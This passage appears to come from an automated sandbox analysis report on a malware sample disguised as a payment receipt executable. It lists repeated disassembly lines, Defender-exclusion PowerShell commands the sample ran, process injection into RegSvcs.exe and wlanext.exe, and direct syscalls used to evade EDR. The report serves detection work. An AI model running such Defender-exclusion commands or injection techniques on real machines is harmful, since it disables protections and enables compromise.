                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0118F525 mov eax, dword ptr fs:[00000030h]9_2_0118F525
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0118F525 mov eax, dword ptr fs:[00000030h]9_2_0118F525
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0118F525 mov eax, dword ptr fs:[00000030h]9_2_0118F525
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0118F525 mov eax, dword ptr fs:[00000030h]9_2_0118F525
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0118F525 mov eax, dword ptr fs:[00000030h]9_2_0118F525
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_010E8550 mov eax, dword ptr fs:[00000030h]9_2_010E8550
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_010E8550 mov eax, dword ptr fs:[00000030h]9_2_010E8550
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0111B570 mov eax, dword ptr fs:[00000030h]9_2_0111B570
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0111B570 mov eax, dword ptr fs:[00000030h]9_2_0111B570
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_010DB562 mov eax, dword ptr fs:[00000030h]9_2_010DB562
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0111656A mov eax, dword ptr fs:[00000030h]9_2_0111656A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0111656A mov eax, dword ptr fs:[00000030h]9_2_0111656A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0111656A mov eax, dword ptr fs:[00000030h]9_2_0111656A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_010D758F mov eax, dword ptr fs:[00000030h]9_2_010D758F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_010D758F mov eax, dword ptr fs:[00000030h]9_2_010D758F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_010D758F mov eax, dword ptr fs:[00000030h]9_2_010D758F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0116B594 mov eax, dword ptr fs:[00000030h]9_2_0116B594
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0116B594 mov eax, dword ptr fs:[00000030h]9_2_0116B594
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_010E2582 mov eax, dword ptr fs:[00000030h]9_2_010E2582
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_010E2582 mov ecx, dword ptr fs:[00000030h]9_2_010E2582
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0111E59C mov eax, dword ptr fs:[00000030h]9_2_0111E59C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01114588 mov eax, dword ptr fs:[00000030h]9_2_01114588
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0110F5B0 mov eax, dword ptr fs:[00000030h]9_2_0110F5B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0110F5B0 mov eax, dword ptr fs:[00000030h]9_2_0110F5B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0110F5B0 mov eax, dword ptr fs:[00000030h]9_2_0110F5B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0110F5B0 mov eax, dword ptr fs:[00000030h]9_2_0110F5B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0110F5B0 mov eax, dword ptr fs:[00000030h]9_2_0110F5B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0110F5B0 mov eax, dword ptr fs:[00000030h]9_2_0110F5B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0110F5B0 mov eax, dword ptr fs:[00000030h]9_2_0110F5B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0110F5B0 mov eax, dword ptr fs:[00000030h]9_2_0110F5B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0110F5B0 mov eax, dword ptr fs:[00000030h]9_2_0110F5B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_011045B1 mov eax, dword ptr fs:[00000030h]9_2_011045B1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_011045B1 mov eax, dword ptr fs:[00000030h]9_2_011045B1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0119F5BE mov eax, dword ptr fs:[00000030h]9_2_0119F5BE
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_011735BA mov eax, dword ptr fs:[00000030h]9_2_011735BA
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_011735BA mov eax, dword ptr fs:[00000030h]9_2_011735BA
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_011735BA mov eax, dword ptr fs:[00000030h]9_2_011735BA
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_011735BA mov eax, dword ptr fs:[00000030h]9_2_011735BA
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_011605A7 mov eax, dword ptr fs:[00000030h]9_2_011605A7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_011605A7 mov eax, dword ptr fs:[00000030h]9_2_011605A7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_011605A7 mov eax, dword ptr fs:[00000030h]9_2_011605A7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_011015A9 mov eax, dword ptr fs:[00000030h]9_2_011015A9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_011015A9 mov eax, dword ptr fs:[00000030h]9_2_011015A9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_011015A9 mov eax, dword ptr fs:[00000030h]9_2_011015A9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_011015A9 mov eax, dword ptr fs:[00000030h]9_2_011015A9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_011015A9 mov eax, dword ptr fs:[00000030h]9_2_011015A9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0111A5D0 mov eax, dword ptr fs:[00000030h]9_2_0111A5D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0111A5D0 mov eax, dword ptr fs:[00000030h]9_2_0111A5D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0115D5D0 mov eax, dword ptr fs:[00000030h]9_2_0115D5D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0115D5D0 mov ecx, dword ptr fs:[00000030h]9_2_0115D5D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_011095DA mov eax, dword ptr fs:[00000030h]9_2_011095DA
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_011B35D7 mov eax, dword ptr fs:[00000030h]9_2_011B35D7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_011B35D7 mov eax, dword ptr fs:[00000030h]9_2_011B35D7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_011B35D7 mov eax, dword ptr fs:[00000030h]9_2_011B35D7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_011155C0 mov eax, dword ptr fs:[00000030h]9_2_011155C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_011B55C9 mov eax, dword ptr fs:[00000030h]9_2_011B55C9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0111E5CF mov eax, dword ptr fs:[00000030h]9_2_0111E5CF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0111E5CF mov eax, dword ptr fs:[00000030h]9_2_0111E5CF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_010E65D0 mov eax, dword ptr fs:[00000030h]9_2_010E65D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_011015F4 mov eax, dword ptr fs:[00000030h]9_2_011015F4
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_011015F4 mov eax, dword ptr fs:[00000030h]9_2_011015F4
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_011015F4 mov eax, dword ptr fs:[00000030h]9_2_011015F4
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_011015F4 mov eax, dword ptr fs:[00000030h]9_2_011015F4
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_011015F4 mov eax, dword ptr fs:[00000030h]9_2_011015F4
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_011015F4 mov eax, dword ptr fs:[00000030h]9_2_011015F4
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_010E25E0 mov eax, dword ptr fs:[00000030h]9_2_010E25E0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0110E5E7 mov eax, dword ptr fs:[00000030h]9_2_0110E5E7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0110E5E7 mov eax, dword ptr fs:[00000030h]9_2_0110E5E7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0110E5E7 mov eax, dword ptr fs:[00000030h]9_2_0110E5E7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0110E5E7 mov eax, dword ptr fs:[00000030h]9_2_0110E5E7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0110E5E7 mov eax, dword ptr fs:[00000030h]9_2_0110E5E7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0110E5E7 mov eax, dword ptr fs:[00000030h]9_2_0110E5E7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0110E5E7 mov eax, dword ptr fs:[00000030h]9_2_0110E5E7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0110E5E7 mov eax, dword ptr fs:[00000030h]9_2_0110E5E7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0111C5ED mov eax, dword ptr fs:[00000030h]9_2_0111C5ED
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0111C5ED mov eax, dword ptr fs:[00000030h]9_2_0111C5ED
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01167410 mov eax, dword ptr fs:[00000030h]9_2_01167410
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01118402 mov eax, dword ptr fs:[00000030h]9_2_01118402
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01118402 mov eax, dword ptr fs:[00000030h]9_2_01118402
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01118402 mov eax, dword ptr fs:[00000030h]9_2_01118402
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0110340D mov eax, dword ptr fs:[00000030h]9_2_0110340D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0111A430 mov eax, dword ptr fs:[00000030h]9_2_0111A430
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_010DC427 mov eax, dword ptr fs:[00000030h]9_2_010DC427
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_010DE420 mov eax, dword ptr fs:[00000030h]9_2_010DE420
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_010DE420 mov eax, dword ptr fs:[00000030h]9_2_010DE420
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_010DE420 mov eax, dword ptr fs:[00000030h]9_2_010DE420
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01166420 mov eax, dword ptr fs:[00000030h]9_2_01166420
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01166420 mov eax, dword ptr fs:[00000030h]9_2_01166420
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01166420 mov eax, dword ptr fs:[00000030h]9_2_01166420
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01166420 mov eax, dword ptr fs:[00000030h]9_2_01166420
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01166420 mov eax, dword ptr fs:[00000030h]9_2_01166420
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01166420 mov eax, dword ptr fs:[00000030h]9_2_01166420
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01166420 mov eax, dword ptr fs:[00000030h]9_2_01166420
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0119F453 mov eax, dword ptr fs:[00000030h]9_2_0119F453
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0110245A mov eax, dword ptr fs:[00000030h]9_2_0110245A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_010EB440 mov eax, dword ptr fs:[00000030h]9_2_010EB440
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_010EB440 mov eax, dword ptr fs:[00000030h]9_2_010EB440
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_010EB440 mov eax, dword ptr fs:[00000030h]9_2_010EB440
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_010EB440 mov eax, dword ptr fs:[00000030h]9_2_010EB440
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_010EB440 mov eax, dword ptr fs:[00000030h]9_2_010EB440
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_010EB440 mov eax, dword ptr fs:[00000030h]9_2_010EB440
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_010D645D mov eax, dword ptr fs:[00000030h]9_2_010D645D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0111E443 mov eax, dword ptr fs:[00000030h]9_2_0111E443
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0111E443 mov eax, dword ptr fs:[00000030h]9_2_0111E443
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0111E443 mov eax, dword ptr fs:[00000030h]9_2_0111E443
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0111E443 mov eax, dword ptr fs:[00000030h]9_2_0111E443
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0111E443 mov eax, dword ptr fs:[00000030h]9_2_0111E443
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0111E443 mov eax, dword ptr fs:[00000030h]9_2_0111E443
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0111E443 mov eax, dword ptr fs:[00000030h]9_2_0111E443
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0111E443 mov eax, dword ptr fs:[00000030h]9_2_0111E443
                Source: C:\Users\user\Desktop\PAYMENT RECEIPT_USD21,000.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT RECEIPT_USD21,000.exeMemory allocated: page read and write | page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Adds a directory exclusion to Windows Defender
                Source: C:\Users\user\Desktop\PAYMENT RECEIPT_USD21,000.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PAYMENT RECEIPT_USD21,000.exe"
                Source: C:\Users\user\Desktop\PAYMENT RECEIPT_USD21,000.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\fttQgpyzkkc.exe"
                Source: C:\Users\user\Desktop\PAYMENT RECEIPT_USD21,000.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PAYMENT RECEIPT_USD21,000.exe"Jump to behavior
                Source: C:\Users\user\Desktop\PAYMENT RECEIPT_USD21,000.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\fttQgpyzkkc.exe"Jump to behavior
                Allocates memory in foreign processes
                Source: C:\Users\user\AppData\Roaming\fttQgpyzkkc.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 protect: page execute and read and writeJump to behavior
                Found direct / indirect Syscall (likely to bypass EDR)
                Source: C:\Program Files (x86)\rRvWLUQkWRUiDWcyGCVBPQFatIlfXSOAvcjgOpugHDmsMNsHfOXhuagmOYQRFvlzQ\VfJW2xm7a.exeNtAllocateVirtualMemory: Direct from: 0x76EF48ECJump to behavior
                Source: C:\Program Files (x86)\rRvWLUQkWRUiDWcyGCVBPQFatIlfXSOAvcjgOpugHDmsMNsHfOXhuagmOYQRFvlzQ\VfJW2xm7a.exeNtQueryAttributesFile: Direct from: 0x76EF2E6C
                Source: C:\Program Files (x86)\rRvWLUQkWRUiDWcyGCVBPQFatIlfXSOAvcjgOpugHDmsMNsHfOXhuagmOYQRFvlzQ\VfJW2xm7a.exeNtQueryVolumeInformationFile: Direct from: 0x76EF2F2CJump to behavior
                Source: C:\Program Files (x86)\rRvWLUQkWRUiDWcyGCVBPQFatIlfXSOAvcjgOpugHDmsMNsHfOXhuagmOYQRFvlzQ\VfJW2xm7a.exeNtQuerySystemInformation: Direct from: 0x76EF48CC
                Source: C:\Program Files (x86)\rRvWLUQkWRUiDWcyGCVBPQFatIlfXSOAvcjgOpugHDmsMNsHfOXhuagmOYQRFvlzQ\VfJW2xm7a.exeNtOpenSection: Direct from: 0x76EF2E0C
                Source: C:\Program Files (x86)\rRvWLUQkWRUiDWcyGCVBPQFatIlfXSOAvcjgOpugHDmsMNsHfOXhuagmOYQRFvlzQ\VfJW2xm7a.exeNtDeviceIoControlFile: Direct from: 0x76EF2AEC
                Source: C:\Program Files (x86)\rRvWLUQkWRUiDWcyGCVBPQFatIlfXSOAvcjgOpugHDmsMNsHfOXhuagmOYQRFvlzQ\VfJW2xm7a.exeNtAllocateVirtualMemory: Direct from: 0x76EF2BEC
                Source: C:\Program Files (x86)\rRvWLUQkWRUiDWcyGCVBPQFatIlfXSOAvcjgOpugHDmsMNsHfOXhuagmOYQRFvlzQ\VfJW2xm7a.exeNtQueryInformationToken: Direct from: 0x76EF2CAC
                Source: C:\Program Files (x86)\rRvWLUQkWRUiDWcyGCVBPQFatIlfXSOAvcjgOpugHDmsMNsHfOXhuagmOYQRFvlzQ\VfJW2xm7a.exeNtCreateFile: Direct from: 0x76EF2FEC
                Source: C:\Program Files (x86)\rRvWLUQkWRUiDWcyGCVBPQFatIlfXSOAvcjgOpugHDmsMNsHfOXhuagmOYQRFvlzQ\VfJW2xm7a.exeNtOpenFile: Direct from: 0x76EF2DCC
                Source: C:\Program Files (x86)\rRvWLUQkWRUiDWcyGCVBPQFatIlfXSOAvcjgOpugHDmsMNsHfOXhuagmOYQRFvlzQ\VfJW2xm7a.exeNtTerminateThread: Direct from: 0x76EF2FCC
                Source: C:\Program Files (x86)\rRvWLUQkWRUiDWcyGCVBPQFatIlfXSOAvcjgOpugHDmsMNsHfOXhuagmOYQRFvlzQ\VfJW2xm7a.exeNtOpenKeyEx: Direct from: 0x76EF2B9C
                Source: C:\Program Files (x86)\rRvWLUQkWRUiDWcyGCVBPQFatIlfXSOAvcjgOpugHDmsMNsHfOXhuagmOYQRFvlzQ\VfJW2xm7a.exeNtSetInformationProcess: Direct from: 0x76EF2C5C
                Source: C:\Program Files (x86)\rRvWLUQkWRUiDWcyGCVBPQFatIlfXSOAvcjgOpugHDmsMNsHfOXhuagmOYQRFvlzQ\VfJW2xm7a.exeNtProtectVirtualMemory: Direct from: 0x76EF2F9C
                Source: C:\Program Files (x86)\rRvWLUQkWRUiDWcyGCVBPQFatIlfXSOAvcjgOpugHDmsMNsHfOXhuagmOYQRFvlzQ\VfJW2xm7a.exeNtWriteVirtualMemory: Direct from: 0x76EF2E3CJump to behavior
                Source: C:\Program Files (x86)\rRvWLUQkWRUiDWcyGCVBPQFatIlfXSOAvcjgOpugHDmsMNsHfOXhuagmOYQRFvlzQ\VfJW2xm7a.exeNtNotifyChangeKey: Direct from: 0x76EF3C2C
                Source: C:\Program Files (x86)\rRvWLUQkWRUiDWcyGCVBPQFatIlfXSOAvcjgOpugHDmsMNsHfOXhuagmOYQRFvlzQ\VfJW2xm7a.exeNtCreateMutant: Direct from: 0x76EF35CC
                Source: C:\Program Files (x86)\rRvWLUQkWRUiDWcyGCVBPQFatIlfXSOAvcjgOpugHDmsMNsHfOXhuagmOYQRFvlzQ\VfJW2xm7a.exeNtResumeThread: Direct from: 0x76EF36AC
                Source: C:\Program Files (x86)\rRvWLUQkWRUiDWcyGCVBPQFatIlfXSOAvcjgOpugHDmsMNsHfOXhuagmOYQRFvlzQ\VfJW2xm7a.exeNtMapViewOfSection: Direct from: 0x76EF2D1C
                Source: C:\Program Files (x86)\rRvWLUQkWRUiDWcyGCVBPQFatIlfXSOAvcjgOpugHDmsMNsHfOXhuagmOYQRFvlzQ\VfJW2xm7a.exeNtProtectVirtualMemory: Direct from: 0x76EE7B2E
                Source: C:\Program Files (x86)\rRvWLUQkWRUiDWcyGCVBPQFatIlfXSOAvcjgOpugHDmsMNsHfOXhuagmOYQRFvlzQ\VfJW2xm7a.exeNtAllocateVirtualMemory: Direct from: 0x76EF2BFC
                Source: C:\Program Files (x86)\rRvWLUQkWRUiDWcyGCVBPQFatIlfXSOAvcjgOpugHDmsMNsHfOXhuagmOYQRFvlzQ\VfJW2xm7a.exeNtQuerySystemInformation: Direct from: 0x76EF2DFC
                Source: C:\Program Files (x86)\rRvWLUQkWRUiDWcyGCVBPQFatIlfXSOAvcjgOpugHDmsMNsHfOXhuagmOYQRFvlzQ\VfJW2xm7a.exeNtReadFile: Direct from: 0x76EF2ADCJump to behavior
                Source: C:\Program Files (x86)\rRvWLUQkWRUiDWcyGCVBPQFatIlfXSOAvcjgOpugHDmsMNsHfOXhuagmOYQRFvlzQ\VfJW2xm7a.exeNtDelayExecution: Direct from: 0x76EF2DDC
                Source: C:\Program Files (x86)\rRvWLUQkWRUiDWcyGCVBPQFatIlfXSOAvcjgOpugHDmsMNsHfOXhuagmOYQRFvlzQ\VfJW2xm7a.exeNtQueryInformationProcess: Direct from: 0x76EF2C26
                Source: C:\Program Files (x86)\rRvWLUQkWRUiDWcyGCVBPQFatIlfXSOAvcjgOpugHDmsMNsHfOXhuagmOYQRFvlzQ\VfJW2xm7a.exeNtResumeThread: Direct from: 0x76EF2FBCJump to behavior
                Source: C:\Program Files (x86)\rRvWLUQkWRUiDWcyGCVBPQFatIlfXSOAvcjgOpugHDmsMNsHfOXhuagmOYQRFvlzQ\VfJW2xm7a.exeNtCreateUserProcess: Direct from: 0x76EF371CJump to behavior
                Source: C:\Program Files (x86)\rRvWLUQkWRUiDWcyGCVBPQFatIlfXSOAvcjgOpugHDmsMNsHfOXhuagmOYQRFvlzQ\VfJW2xm7a.exeNtAllocateVirtualMemory: Direct from: 0x76EF3C9C
                Source: C:\Program Files (x86)\rRvWLUQkWRUiDWcyGCVBPQFatIlfXSOAvcjgOpugHDmsMNsHfOXhuagmOYQRFvlzQ\VfJW2xm7a.exeNtWriteVirtualMemory: Direct from: 0x76EF490CJump to behavior
                Source: C:\Program Files (x86)\rRvWLUQkWRUiDWcyGCVBPQFatIlfXSOAvcjgOpugHDmsMNsHfOXhuagmOYQRFvlzQ\VfJW2xm7a.exeNtSetInformationThread: Direct from: 0x76EE63F9
                Source: C:\Program Files (x86)\rRvWLUQkWRUiDWcyGCVBPQFatIlfXSOAvcjgOpugHDmsMNsHfOXhuagmOYQRFvlzQ\VfJW2xm7a.exeNtClose: Direct from: 0x76EF2B6C
                Source: C:\Program Files (x86)\rRvWLUQkWRUiDWcyGCVBPQFatIlfXSOAvcjgOpugHDmsMNsHfOXhuagmOYQRFvlzQ\VfJW2xm7a.exeNtSetInformationThread: Direct from: 0x76EF2B4C
                Source: C:\Program Files (x86)\rRvWLUQkWRUiDWcyGCVBPQFatIlfXSOAvcjgOpugHDmsMNsHfOXhuagmOYQRFvlzQ\VfJW2xm7a.exeNtReadVirtualMemory: Direct from: 0x76EF2E8CJump to behavior
                Source: C:\Program Files (x86)\rRvWLUQkWRUiDWcyGCVBPQFatIlfXSOAvcjgOpugHDmsMNsHfOXhuagmOYQRFvlzQ\VfJW2xm7a.exeNtCreateKey: Direct from: 0x76EF2C6C
                Injects a PE file into a foreign processes
                Source: C:\Users\user\AppData\Roaming\fttQgpyzkkc.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5AJump to behavior
                Maps a DLL or memory area into another process
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeSection loaded: NULL target: C:\Program Files (x86)\rRvWLUQkWRUiDWcyGCVBPQFatIlfXSOAvcjgOpugHDmsMNsHfOXhuagmOYQRFvlzQ\VfJW2xm7a.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeSection loaded: NULL target: C:\Windows\SysWOW64\wlanext.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\wlanext.exeSection loaded: NULL target: C:\Program Files (x86)\rRvWLUQkWRUiDWcyGCVBPQFatIlfXSOAvcjgOpugHDmsMNsHfOXhuagmOYQRFvlzQ\VfJW2xm7a.exe protection: read writeJump to behavior
